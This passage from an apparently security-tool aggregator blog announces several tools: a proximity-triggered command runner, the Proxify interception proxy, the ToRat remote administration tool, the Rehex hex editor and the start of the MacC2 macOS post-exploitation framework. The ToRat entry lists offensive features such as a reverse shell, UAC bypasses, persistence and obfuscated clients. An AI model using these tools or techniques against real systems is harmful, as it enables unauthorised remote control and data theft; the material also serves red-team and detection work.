/></code></pre> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/TW-D/Pineapple-MK7-REST-Client" rel="nofollow" target="_blank" title="Download Pineapple-MK7-REST-Client">Download Pineapple-MK7-REST-Client</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-11889068144657890132021-01-13T08:30:00.000-03:002021-01-13T08:30:00.528-03:00RadareEye - A Tool Made For Specially Scanning Nearby devices [BLE, Bluetooth And Wifi] And Execute Our Given Command On Our System When The Target Device Comes In-Between Range<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-5yTuGyVFidA/X_usRh51YJI/AAAAAAAAU8Y/UBTU6sRz5dowe2mr3T8SvxntFuJxkyyJQCNcBGAsYHQ/s500/RadareEye_1_logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="500" data-original-width="500" src="https://1.bp.blogspot.com/-5yTuGyVFidA/X_usRh51YJI/AAAAAAAAU8Y/UBTU6sRz5dowe2mr3T8SvxntFuJxkyyJQCNcBGAsYHQ/s16000/RadareEye_1_logo.png" /></a></div><p><br /></p><p></p> <h3 align="center"><b>A tool made for specially <a href="https://www.kitploit.com/search/label/Scanning" target="_blank" title="scanning">scanning</a> nearby devices[BLE,Bluetooth & Wifi] and execute our given command on our system when the target device comes in between range.</b></h3><p><span></span></p><a name='more'></a><p></p><p><strong><br /></strong></p><p><strong>NOTE:- RadareEye Owner will be not responsible if any user performs malicious activities using this tool. Use it for Learning purpose only.</strong></p> <ul> <li><strong>Installation of RadareEye :</strong></li> </ul> <pre><code>git clone https://github.com/souravbaghz/RadareEye<br /></code></pre> <br /><span style="font-size: large;"><b>Usage:</b></span><br /> <pre><code>./radare <mac_addr> <option><br /></code></pre> <br /><span style="font-size: large;"><b>Available Options Are:</b></span><br /> <ul> <li>-blue <a href="https://www.kitploit.com/search/label/Bluetooth" target="_blank" title="Bluetooth">Bluetooth</a> RadareEye</li> <li>-ble BLE radareEye</li> <li>-wifi Wifi AP radareEye</li></ul><div><br /></div> <ul> <li><strong>Running Bluetooth RadareEye :</strong></li> </ul> <pre><code>sudo bash <a href="https://www.kitploit.com/search/label/Radare" target="_blank" title="radare">radare</a> XX:XX:XX:XX:XX:XX -blue<br /></code></pre> <ul> <li><strong>Running BLE RadareEye :</strong></li> </ul> <pre><code>sudo bash radare XX:XX:XX:XX:XX:XX -ble<br /></code></pre> <p>Same for the Wifi also with -wifi option, Here XX:XX:XX:XX:XX:XX means your target device's MAC Address & make sure to do with sudo (if you aren't root). I didn't add scanning feature in this script but you can get thr MAC Adress easily by executing 'hcitool scan' for bluetooth and 'hcitool lescan' for BLE Devices in terminal.</p> <p align="center"><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-F8M_YGyeUes/X_usJ4Zwx3I/AAAAAAAAU8U/RLBXPCuNRhM6QB0SEnu9Lqo86ZmLh0LcgCNcBGAsYHQ/s1920/RadareEye_2_screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="360" src="https://1.bp.blogspot.com/-F8M_YGyeUes/X_usJ4Zwx3I/AAAAAAAAU8U/RLBXPCuNRhM6QB0SEnu9Lqo86ZmLh0LcgCNcBGAsYHQ/w640-h360/RadareEye_2_screenshot.png" width="640" /></a></div><p align="center"><br /></p> After running RadareEye, It will ask you 'Command you want to trigger?' , you can skip it by simply keep it blank and it RadareEye will show you status of your target whether it's in range or not without triggering any command. If you want to trigger any command when your target comes in between range then enter a command when it asks. Examples : <ul> <li><strong>Below given command will shutdown our system imediatly when target device comes in range.</strong></li> </ul> <pre><code>[+]Command you want to trigger? :shutdown now<br /></code></pre> <ul> <li><strong>It will run your other script</strong></li> </ul> <pre><code>[+]Command you want to trigger? :./myscript.py<br /></code></pre> <br /><div><div style="text-align: center;"><b><br /></b></div><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/souravbaghz/RadareEye" rel="nofollow" target="_blank" title="Download RadareEye">Download RadareEye</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-45667280855567076952020-12-27T08:30:00.006-03:002020-12-27T08:30:04.561-03:00Proxify - Swiss Army Knife Proxy Tool For HTTP/HTTPS Traffic Capture, Manipulation, And Replay On The Go<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-dJhyUjQ-YrE/X-LNCYqfaCI/AAAAAAAAUwU/XcybR9rXo6E22foGs7KmSDEJxz_cxQ_vwCNcBGAsYHQ/s1852/proxify_7_proxify-run.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1488" data-original-width="1852" height="514" src="https://1.bp.blogspot.com/-dJhyUjQ-YrE/X-LNCYqfaCI/AAAAAAAAUwU/XcybR9rXo6E22foGs7KmSDEJxz_cxQ_vwCNcBGAsYHQ/w640-h514/proxify_7_proxify-run.png" width="640" /></a></div><p><br /></p><p></p> <p>Swiss Army Knife Proxy for rapid deployments. Supports multiple operations such as request/response dump, filtering and <a href="https://www.kitploit.com/search/label/Manipulation" target="_blank" title="manipulation">manipulation</a> via DSL language, upstream HTTP/Socks5 proxy. Additionally a replay utility allows to import the dumped traffic (request/responses with correct domain name) into burp or any other proxy by simply setting the upstream proxy to proxify.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: x-large;"><b>Features</b></span><div><br /></div><div><ul style="text-align: left;"><li>Simple and modular code base making it easy to contribute.</li><li>HTTP and SOCKS5 support for upstream proxy</li><li>Native MITM support</li><li>Full traffic dump (request/responses)</li><li>Traffic Match / Filter with DSL language</li><li>Traffic Match and Replace support</li><li>Traffic replay in Burp</li></ul></div><div><br /><h1 align="left"><span style="font-size: x-large;"><b>Installation</b></span><br /> <br /><span style="font-size: large;"><b>From Binary</b></span><br /> </h1><p>The installation is easy. You can download the pre-built binaries for your platform from the <a href="https://github.com/projectdiscovery/proxify/releases/" rel="nofollow" target="_blank" title="Releases">Releases</a> page. Extract them using tar, move it to your <code>$PATH</code>and you're ready to go.</p> <div><pre><code>▶ tar -xvf proxify-linux-amd64.tar<br />▶ mv proxify-linux-amd64 /usr/local/bin/proxify<br />▶ proxify -version</code></pre></div> <p><strong>proxify</strong> requires <strong>go1.14+</strong> to install successfully. Run the following command to get the repo -</p> <br /><span style="font-size: large;"><b>From Source</b></span><br /> <div><pre><code>▶ GO111MODULE=on go get -u github.com/projectdiscovery/proxify/cmd/proxify</code></pre></div> <br /><span style="font-size: large;"><b>From Github</b></span><br /> <div><pre><code>▶ git clone https://github.com/projectdiscovery/proxify.git; cd proxify/cmd/proxify; go build; cp proxify /usr/local/bin; proxify -version</code></pre></div> <br /><span style="font-size: x-large;"><b>Usage</b></span><br /> <div><pre><code>▶ proxify -h</code></pre></div> <p>This will display help for the tool. Here are all the switches it supports.</p> <table> <tr> <th>Flag</th> <th>Description</th> <th>Example</th> </tr> <tr> <td>addr</td> <td>Listen HTTP IP and Port</td> <td>proxify -addr 127.0.0.1:8080</td> </tr> <tr> <td>config</td> <td>Config data path</td> <td>proxify -config certs</td> </tr> <tr> <td>cert-cache-size</td> <td>Number of <a href="https://www.kitploit.com/search/label/Certificates" target="_blank" title="certificates">certificates</a> to cache</td> <td>proxify -cert-cache-size 1024</td> </tr> <tr> <td>dns-addr</td> <td>Listen DNS IP and Port</td> <td>proxify -dns-addr '127.0.0.1:80'</td> </tr> <tr> <td>dns-mapping</td> <td>DNS A mapping</td> <td>proxify -dns-mapping test.com:80</td> </tr> <tr> <td>dns-resolver</td> <td>Listen DNS IP and Port</td> <td>proxify -dns-resolver '127.0.0.1:5353'</td> </tr> <tr> <td>http-proxy</td> <td>Upstream HTTP Proxy</td> <td>proxify -http-proxy hxxp://127.0.0.1:8080</td> </tr> <tr> <td>no-color</td> <td>No Color in output</td> <td>proxify -no-color</td> </tr> <tr> <td>output</td> <td>Output Folder</td> <td>proxify -output logs</td> </tr> <tr> <td>request-dsl</td> <td>Request Filter DSL</td> <td>proxify -request-dsl "contains(request,'admim')"</td> </tr> <tr> <td>request-match-replace-dsl</td> <td>Request Match-Replace DSL</td> <td>proxify -request-match-replace-dsl "replace(request,'false','true')"</td> </tr> <tr> <td>response-dsl</td> <td>Response Filter DSL</td> <td>proxify -response-dsl "contains(response, md5('test'))"</td> </tr> <tr> <td>response-match-replace-dsl</td> <td>Response Match-Replace DSL</td> <td>proxify -response-match-replace-dsl "regex(response, '^authentication failed$', 'authentication ok')"</td> </tr> <tr> <td>silent</td> <td>Silent output</td> <td>proxify -silent</td> </tr> <tr> <td>socks5-proxy</td> <td>Upstream socks5 proxy</td> <td>proxify -socks5-proxy socks5://proxy-ip:port</td> </tr> <tr> <td>v</td> <td>Verbose output</td> <td>proxify -v</td> </tr> <tr> <td>version</td> <td>Current version</td> <td>proxify -version</td> </tr> </table> <br /><span style="font-size: large;"><b>Use Upstream proxy</b></span><br /> <p>Open a local proxy on port 8081 and forward the traffic to burp on port 8080</p> <div><pre><code>▶ proxify -addr ":8081" -http-proxy http://127.0.0.1:8080</code></pre></div> <p>Open a local proxy on port 8080 and forward the traffic to the TOR network</p> <div><pre><code>▶ proxify -socks5-proxy socks5://127.0.0.1:9050</code></pre></div> <br /><span style="font-size: large;"><b>Dump all the HTTP/HTTPS traffic</b></span><br /> <p>Dump all the traffic into separate files with request followed by the response, as default <code>proxify</code> listen to <code>http://127.0.0.0:8080</code>. Custom address and port can be defined using <code>addr</code> flag.</p> <p>As default, proxied request/resposed are stored in the <code>logs</code> folder.</p> <div><pre><code>▶ proxify -output db</code></pre></div> <br /><span style="font-size: large;"><b>Hostname mapping with Local DNS resolver</b></span><br /> <p>Proxify supports embedding DNS resolver to map <a href="https://www.kitploit.com/search/label/Hostnames" target="_blank" title="hostnames">hostnames</a> to specific addresses and define an upstream dns server for any other domain name</p> <p>start a local http proxy on port 8080 using an <a href="https://www.kitploit.com/search/label/Embedded" target="_blank" title="embedded">embedded</a> dns server listening on port 53 and resolving <a href="http://www.google.it" rel="nofollow" target="_blank" title="www.google.it">www.google.it</a> to 192.168.1.1, all other fqdn are forwarded upstream to 1.1.1.1</p> <div><pre><code>▶ proxify -dns-addr ":53" -dns-mapping "www.google.it:192.168.1.1" -dns-resolver "1.1.1.1:53"</code></pre></div> <p>This feature is used for example by the <code>replay</code> utility to hijack the connections and simulate responses. It may be useful during internal assessments with private dns servers. Using <code>*</code> as domain name matches all dns requests.</p> <br /><span style="font-size: large;"><b>Match/Filter traffic with with DSL language.</b></span><br /> <p>If the request or response match the filters the dump is tagged with <code>.match.txt</code> suffix:</p> <div><pre><code>▶ proxify -request-dsl "contains(request,'firefox')" -response-dsl "contains(response, md5('test'))"</code></pre></div> <br /><span style="font-size: large;"><b>Match and Replace on the fly</b></span><br /> <p>Proxify supports modifying Request and Responses on the fly with DSL language.</p> <div><pre><code>▶ proxify -request-match-replace-dsl "replace(request,'firefox','chrome')" -response-match-replace-dsl "regex(response, '^authentication failed$', 'authentication ok')"</code></pre></div> <br /><span style="font-size: large;"><b>Replay all traffic into burp</b></span><br /> <p>Replay all the dumped requests/responses into the destination URL (<a href="http://127.0.0.1:8080" rel="nofollow" target="_blank" title="http://127.0.0.1:8080">http://127.0.0.1:8080</a>) if not specified. For this to work it's necessary to configure burp to use proxify as upstream proxy, as it will take care to hijack the dns resolutions and simulate the remote server with the dumped request. This allows to have in the burp history exactly all requests/responses as if they were originally sent through it, allowing for example to perform a remote interception on cloud, and merge all results locally within burp.</p> <div><pre><code>▶ replay -output "logs/"</code></pre></div> <br /><span style="font-size: large;"><b>Installing SSL Certificate</b></span><br /> <p>A certificate authority is generated for proxify which is stored in the folder <code>~/.config/proxify/</code> as default, manually can be specified by <code>-config</code> flag. The generated certificate can be imported by visiting <a href="http://proxify/cacert.crt" rel="nofollow" target="_blank" title="http://proxify/cacert.crt">http://proxify/cacert.crt</a> in a browser connected to proxify.</p> <p>Installation steps for the Root Certificate is similar to other proxy tools which includes adding the cert to system trusted root store.</p> <br /><span style="font-size: large;"><b>Applications of Proxify</b></span><br /> <p>Proxify can be used for multiple places, here are some common example where Proxify comes handy:-</p> <details> <summary> Storing all the burp proxy history logs locally. </summary> <p>Start a proxify on port <code>8081</code> with HTTP Proxy pointing to <a href="https://www.kitploit.com/search/label/Burp%20Suite" target="_blank" title="burp suite">burp suite</a> port <code>8080</code></p> <pre><code>proxify -addr "127.0.0.1:8081" -http-proxy "http://127.0.0.1:8080"<br /></code></pre> <p>From burp, set the Upstream Proxy to forward all the traffic back to <code>proxify</code></p> <pre><code>User Options > Upstream Proxy > Proxy & Port > 127.0.0.1 & 8081<br /></code></pre> <p>Now all the request/response history will be stored in <code>logs</code> folder that can be used later for post processing.</p> </details> <details> <summary> Store all your browse histroy locally. </summary> <p>While you browse the application, you can point the browser to <code>proxify</code> to store all the HTTP request / response to file.</p> <p>Start proxify on default or any port you wish,</p> <pre><code>proxify -output chrome-logs -addr ":9999"<br /></code></pre> <p>Start Chrome browser in Mac OS,</p> <pre><code>/Applications/Chromium.app/Contents/MacOS/Chromium --ignore-certificate-errors --proxy-server=http://127.0.0.1:9999 &<br /></code></pre> </details> <details> <summary> Store all the response of while you fuzz as per you config at run time. </summary> <p>Start proxify on default or any port you wish,</p> <pre><code>proxify -output ffuf-logs -addr ":9999"<br /></code></pre> <p>Run <code>FFuF</code> with proxy pointing to <code>proxify</code></p> <pre><code>ffuf -x http://127.0.0.1:9999 FFUF_CMD_HERE<br /></code></pre> </details> <p>Proxify is made with </p><div></div> by the <a href="https://projectdiscovery.io" rel="nofollow" target="_blank" title="projectdiscovery">projectdiscovery</a> team. Community contributions have made the project what it is. See the <strong><a href="https://github.com/projectdiscovery/proxify/blob/master/THANKS.md" rel="nofollow" target="_blank" title="Thanks.md">Thanks.md</a></strong> file for more details. <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/projectdiscovery/proxify" rel="nofollow" target="_blank" title="Download Proxify">Download Proxify</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-61243053795052852832020-12-15T08:30:00.013-03:002020-12-15T08:30:05.171-03:00ToRat - A Remote Administation Tool Written In Go Using Tor As A Transport Mechanism And RPC For Communication<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-94hr0gBJ-Oo/X9bqgzXBZ_I/AAAAAAAAUpE/uSZDA4-rSG0WCWwCiMZzu8QxpITOHX6oACNcBGAsYHQ/s1023/ToRat_1_ToRat_Logo.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="250" data-original-width="1023" height="156" src="https://1.bp.blogspot.com/-94hr0gBJ-Oo/X9bqgzXBZ_I/AAAAAAAAUpE/uSZDA4-rSG0WCWwCiMZzu8QxpITOHX6oACNcBGAsYHQ/w640-h156/ToRat_1_ToRat_Logo.png" width="640" /></a></div><p><br /></p> <p>A <a href="https://www.kitploit.com/search/label/Cross%20Platform" target="_blank" title="Cross Platform">Cross Platform</a> <a href="https://www.kitploit.com/search/label/Remote%20Administration" target="_blank" title="Remote Administration">Remote Administration</a> tool written in Go using Tor as its transport mechanism currently supporting Windows, Linux, MacOS clients.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>How to</b></span><br /> <p><a href="https://github.com/lu4p/ToRat/wiki/How-to-use-the-ToRat-Docker-Image" rel="nofollow" target="_blank" title="How to use ToRat">How to use ToRat</a></p> <br /><span style="font-size: large;"><b><a href="https://asciinema.org/a/318534" target="_blank">Preview</a></b></span><br /> <p><br /></p><span style="font-size: large;"><b>Current Features</b></span><br /> <ul> <li>RPC (Remote procedure Call) based communication for easy addition of new functionallity</li> <li>Automatic upx leads to client binaries of ~6MB with embedded Tor</li> <li>the ToRAT_client communicates over TLS encrypted RPC proxied through Tor with the ToRat_server (hidden service) <ul class="contains-task-list"> <li class="task-list-item">anonymity of client and server</li> <li class="task-list-item">end-to-end encryption</li> </ul> </li> <li>Cross Platform reverse shell (Windows, Linux, Mac OS)</li> <li>Windows: <ul> <li>Multiple User Account Control Bypasses (Privilege escalation)</li> <li>Multiple Persistence methods (User, Admin)</li> </ul> </li> <li>Linux: <ul> <li>Multiple Persistence methods (User, Admin)</li> </ul> </li> <li>optional transport without Tor e.g. Use Tor2Web, a DNS Hostname or public/ local IP <ul class="contains-task-list"> <li class="task-list-item">smaller binary ~7MB upx'ed</li> <li class="task-list-item">anonymity of client and server</li> </ul> </li> <li>embedded Tor</li> <li>Unique persistent ID for every client <ul> <li>give a client an Alias</li> <li>all Downloads from client get saved to ./$ID/$filename</li> </ul> </li> <li>sqlite via gorm for storing information about the clients</li> <li>client is obfuscated via <a href="https://github.com/burrowers/garble" rel="nofollow" target="_blank" title="garble">garble</a></li> </ul> <br /><b>Server Shell</b><br /> <ul> <li>Supports multiple connections</li> <li>Welcome Banner</li> <li>Colored Output</li> <li>Tab-Completion of: <ul> <li>Commands</li> <li>Files/ Directories in the working directory of the server</li> </ul> </li> </ul> <table> <tbody><tr> <th>Command</th> <th>Info</th> </tr> <tr> <td><strong>select</strong></td> <td>Select client to interact with</td> </tr> <tr> <td><strong>list</strong></td> <td>list all connected clients</td> </tr> <tr> <td><strong>alias</strong></td> <td>Select client to give an alias</td> </tr> <tr> <td><strong>cd</strong></td> <td>change the working directory of the server</td> </tr> <tr> <td><strong>help</strong></td> <td>lists possible commands with usage info</td> </tr> <tr> <td><strong>exit</strong></td> <td>exit the server</td> </tr> </tbody></table> <br /><b>Shell after selection of a client</b><br /> <ul> <li>Tab-Completion of: <ul> <li>Commands</li> <li>Files/ Directories in the working directory of the client</li> </ul> </li> </ul> <table> <tbody><tr> <th>Command</th> <th>Info</th> </tr> <tr> <td><strong>cd</strong></td> <td>change the working directory of the client</td> </tr> <tr> <td><strong>ls</strong></td> <td>list the content of the working directory of the client</td> </tr> <tr> <td><strong>shred</strong></td> <td>delete files/ directories unrecoverable</td> </tr> <tr> <td><strong>shredremove</strong></td> <td>same as shred + removes the shredded files</td> </tr> <tr> <td><strong>screen</strong></td> <td>take a <a href="https://www.kitploit.com/search/label/Screenshot" target="_blank" title="Screenshot">Screenshot</a> of the client</td> </tr> <tr> <td><strong>cat</strong></td> <td>view Textfiles from the client including .docx, .rtf, .pdf, .odt</td> </tr> <tr> <td><strong>alias</strong></td> <td>give the client a custom alias</td> </tr> <tr> <td><strong>down</strong></td> <td>download a file from the client</td> </tr> <tr> <td><strong>up</strong></td> <td>upload a file to the client</td> </tr> <tr> <td><strong>escape</strong></td> <td>escape a command and run it in a native shell on the client</td> </tr> <tr> <td><strong>reconnect</strong></td> <td>tell the client to reconnect</td> </tr> <tr> <td><strong>help</strong></td> <td>lists possible commands with usage info</td> </tr> <tr> <td><strong>exit</strong></td> <td>background current session and return to main shell</td> </tr> <tr> <td>else</td> <td>the command will be executed in a native shell on the client</td> </tr> </tbody></table> <br /><span style="font-size: large;"><b>Upcoming Features</b></span><br /> <ul class="contains-task-list"> <li class="task-list-item">Privilege <a href="https://www.kitploit.com/search/label/Escalation" target="_blank" title="escalation">escalation</a> for Linux</li> <li class="task-list-item">Persistence and <a href="https://www.kitploit.com/search/label/Privilege%20Escalation" target="_blank" title="privilege escalation">privilege escalation</a> for Mac OS</li> <li class="task-list-item">Support for Android and iOS needs fix of <a href="https://github.com/ipsn/go-libtor/issues/12" rel="nofollow" target="_blank" title="https://github.com/ipsn/go-libtor/issues/12">https://github.com/ipsn/go-libtor/issues/12</a></li> <li class="task-list-item"><a href="https://github.com/ewhitehats/InvisiblePersistence" rel="nofollow" target="_blank" title="File-less Persistence on Windows">File-less Persistence on Windows</a></li> </ul> <br /><span style="font-size: large;"><b>DISCLAIMER</b></span><br /> <p>USE FOR EDUCATIONAL PURPOSES ONLY</p> <br /><span style="font-size: large;"><b>Contribution</b></span><br /> <p>All contributions are welcome you don't need to be an expert in Go to contribute.</p> <br /><span style="font-size: large;"><b>Credits</b></span><br /> <ul> <li><a href="https://www.torproject.org/" rel="nofollow" target="_blank" title="Tor">Tor</a></li> <li><a href="https://github.com/cretz/bine" rel="nofollow" target="_blank" title="Tor controller libary">Tor controller libary</a></li> <li><a href="https://github.com/rootm0s/WinPwnage" rel="nofollow" target="_blank" title="Python Uacbypass and Persistence Techniques">Python Uacbypass and Persistence Techniques</a></li> <li><a href="https://github.com/abiosoft/ishell" rel="nofollow" target="_blank" title="Modern Cli">Modern Cli</a></li> <li><a href="https://github.com/fatih/color" rel="nofollow" target="_blank" title="Colored Prints">Colored Prints</a></li> <li><a href="https://github.com/vova616/screenshot" rel="nofollow" target="_blank" title="Screenshot libary">Screenshot libary</a></li> <li><a href="https://github.com/lu4p/genCert" rel="nofollow" target="_blank" title="TLS Certificate generator">TLS Certificate generator</a></li> <li><a href="https://github.com/lu4p/genCert" rel="nofollow" target="_blank" title="Shred library">Shred library</a></li> <li><a href="https://github.com/lu4p/cat" rel="nofollow" target="_blank" title="Extract Text from Documents">Extract Text from Documents</a></li> <li><a href="https://golang.org/pkg/net/rpc/" rel="nofollow" target="_blank" title="RPC">RPC</a></li> <li><a href="https://upx.github.io/" rel="nofollow" target="_blank" title="UPX">UPX</a></li> <li><a href="https://github.com/go-gorm/gorm" rel="nofollow" target="_blank" title="gorm">gorm</a></li> <li><a href="https://github.com/burrowers/garble" rel="nofollow" target="_blank" title="Obfuscation">Obfuscation</a></li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/lu4p/ToRat" rel="nofollow" target="_blank" title="Download ToRat">Download ToRat</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-73420285052000041472020-11-17T17:30:00.009-03:002020-11-17T17:30:12.410-03:00Rehex - Reverse Engineers' Hex Editor<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-168MHpgk57E/X7NdmptBhgI/AAAAAAAAUY0/0oPe5hG7G2QHp-FF-tRhCrMmzwlPZmWpQCNcBGAsYHQ/s854/rehex_2_comments-types.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="480" data-original-width="854" height="360" src="https://1.bp.blogspot.com/-168MHpgk57E/X7NdmptBhgI/AAAAAAAAUY0/0oPe5hG7G2QHp-FF-tRhCrMmzwlPZmWpQCNcBGAsYHQ/w640-h360/rehex_2_comments-types.gif" width="640" /></a></div><p><br /></p> <p>A cross-platform (Windows, Linux, Mac) <a href="https://www.kitploit.com/search/label/Hex%20Editor" target="_blank" title="hex editor">hex editor</a> for reverse engineering, and everything else.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Features</b></span><br /> <ul> <li>Large (1TB+) file support</li> <li>Decoding of integer/floating point value types</li> <li>Disassembly of machine code</li> <li>Highlighting and annotation of ranges of bytes</li> <li>Side by side comparision of selections</li> </ul> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-IZmfaVEiZvI/X7NdxXrojTI/AAAAAAAAUY4/o_9bNDdC1DQx6lfqQdKO4fTahkReETxOACNcBGAsYHQ/s854/rehex_2_comments-types.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="480" data-original-width="854" height="360" src="https://1.bp.blogspot.com/-IZmfaVEiZvI/X7NdxXrojTI/AAAAAAAAUY4/o_9bNDdC1DQx6lfqQdKO4fTahkReETxOACNcBGAsYHQ/w640-h360/rehex_2_comments-types.gif" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-VNjiNesvqQQ/X7NdxXQTeTI/AAAAAAAAUY8/_uN45-QIe3skQeJijG65kS7mOGsm9CvLwCNcBGAsYHQ/s854/rehex_3_file-diff.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="480" data-original-width="854" height="360" src="https://1.bp.blogspot.com/-VNjiNesvqQQ/X7NdxXQTeTI/AAAAAAAAUY8/_uN45-QIe3skQeJijG65kS7mOGsm9CvLwCNcBGAsYHQ/w640-h360/rehex_3_file-diff.gif" width="640" /></a></div><p><br /></p><span style="font-size: large;"><b>Installation</b></span><br /> <p>The <a href="https://github.com/solemnwarning/rehex/releases" rel="nofollow" target="_blank" title="Releases">Releases</a> page has standalone packages for <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> and Mac, as well as installable packages for popular Linux distributions, or you can install them from a distribution package repository as described below.</p> <p>The same packages are also produced for Git commits (look for the tick), if you want to try the development/unreleased versions.</p> <br /><b>Debian</b><br /> <p>First, you will need to add my APT signing key to your system:</p> <pre><code>wget -qO - https://repos.solemnwarning.net/debian-key.gpg | sudo apt-key add -<br /></code></pre> <p>Add the following lines to your <code>/etc/apt/sources.list</code> file:</p> <pre><code>deb http://repos.solemnwarning.net/debian/ CODENAME main<br />deb-src http://repos.solemnwarning.net/debian/ CODENAME main<br /></code></pre> <p>Replace <code>CODENAME</code> with the version you're running (e.g. <code>buster</code> or <code>stretch</code>).</p> <p>Finally, you can install the package:</p> <pre><code>$ sudo apt-get update<br />$ sudo apt-get install rehex<br /></code></pre> <br /><b>Ubuntu</b><br /> <p>First, you will need to add my APT signing key to your system:</p> <pre><code>wget -qO - https://repos.solemnwarning.net/ubuntu-key.gpg | sudo apt-key add -<br /></code></pre> <p>Add the following lines to your <code>/etc/apt/sources.list</code> file:</p> <pre><code>deb http://repos.solemnwarning.net/ubuntu/ CODENAME main<br />deb-src http://repos.solemnwarning.net/ubuntu/ CODENAME main<br /></code></pre> <p>Replace <code>CODENAME</code> with the version you're running (e.g. <code>groovy</code> for 20.10 or <code>focal</code> for 20.04).</p> <p>Finally, you can install the package:</p> <pre><code>$ sudo apt-get update<br />$ sudo apt-get install rehex<br /></code></pre> <p><strong>NOTE:</strong> Ubuntu users must have the "Universe" package repository enabled to install some of the dependencies.</p> <br /><b>Fedora</b><br /> <pre><code>$ sudo dnf copr enable solemnwarning/rehex<br />$ sudo dnf install rehex<br /></code></pre> <br /><b>CentOS</b><br /> <pre><code>$ sudo dnf install epel-release<br />$ sudo dnf copr enable solemnwarning/rehex<br />$ sudo dnf install rehex<br /></code></pre> <br /><b>openSUSE</b><br /> <pre><code>$ sudo zypper ar obs://editors editors<br />$ sudo zypper ref<br />$ sudo zypper in rehex<br /></code></pre> <br /><span style="font-size: large;"><b>Building</b></span><br /> <p>If you want to compile on Linux, just check out the source and run <code>make</code>. You will need Jansson, wxWidgets and <a href="https://www.kitploit.com/search/label/Capstone" target="_blank" title="capstone">capstone</a> installed, along with their development packages (Install <code>build-essential</code>, <code>git</code>, <code>libwxgtk3.0-dev</code>, <code>libjansson-dev</code> and <code>libcapstone-dev</code> on Ubuntu).</p> <p>The resulting build can be installed using <code>make install</code>, which accepts all the standard environment variables.</p> <p>For Windows or Mac build instructions, see the relevant README: <a href="https://github.com/solemnwarning/rehex/blob/master/README.Windows.md" rel="nofollow" target="_blank" title="README.Windows.md">README.Windows.md</a> <a href="https://github.com/solemnwarning/rehex/blob/master/README.OSX.md" rel="nofollow" target="_blank" title="README.OSX.md">README.OSX.md</a></p> <br /><span style="font-size: large;"><b>Feedback</b></span><br /> <p>If you find any bugs or have suggestions for improvements or new features, please open an issue on Github, or join the <code>#rehex</code> IRC channel on <code>irc.freenode.net</code>.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/solemnwarning/rehex" rel="nofollow" target="_blank" title="Download Rehex">Download Rehex</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-78238852736802056732020-11-16T17:30:00.054-03:002020-11-16T17:30:00.304-03:00MacC2 - Mac Command And Control That Uses Internal API Calls Instead Of Command Line Utilities<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-He9F4-llbFY/X7H2ikH9vQI/AAAAAAAAUXY/6yDSj3ZKujsP97ogOCw3svushxeUXOyKgCNcBGAsYHQ/s3289/MacC2_9_pic7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="956" data-original-width="3289" height="186" src="https://1.bp.blogspot.com/-He9F4-llbFY/X7H2ikH9vQI/AAAAAAAAUXY/6yDSj3ZKujsP97ogOCw3svushxeUXOyKgCNcBGAsYHQ/w640-h186/MacC2_9_pic7.png" width="640" /></a></div><p><br /></p><p>MacC2 is a macOS <a href="https://www.kitploit.com/search/label/Post%20Exploitation" target="_blank" title="post exploitation">post exploitation</a> tool written in python that uses Objective C calls or python libraries as opposed to <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="command line">command line</a> executions. The client is written in python2, which though deprecated is still being shipped with base Big Sur installs. It is possible down the road that Apple will remove python2 (or python altogether) from base macOS installs but as of Nov 2020 this is not the case. <strong>I wrote this tool to aid <a href="https://www.kitploit.com/search/label/Purple%20Team" target="_blank" title="purple team">purple team</a> exercises aimed at building detections for python-based post <a href="https://www.kitploit.com/search/label/Exploitation" target="_blank" title="exploitation">exploitation</a> frameworks on macOS</strong>. Apple plans to eventu ally remove scripting runtimes from base macOS installs, but it appears that python is still included by default on base installs of Big Sur.</p><span><a name='more'></a></span><p><br /></p> <p>You can set up the server locally or you can use the docker setup I have included in this repo. Instructions below:</p> <br /><span style="font-size: large;"><b>Instructions for Running Using Docker:</b></span><br /> <p><em><strong>If you do not already have docker set up:</strong></em></p> <ol> <li><code>chmod +x install_docker_linux.sh</code></li> <li><code>sudo ./install_docker_linux.sh</code></li> </ol> <p><em><strong>Next:</strong></em></p> <ol> 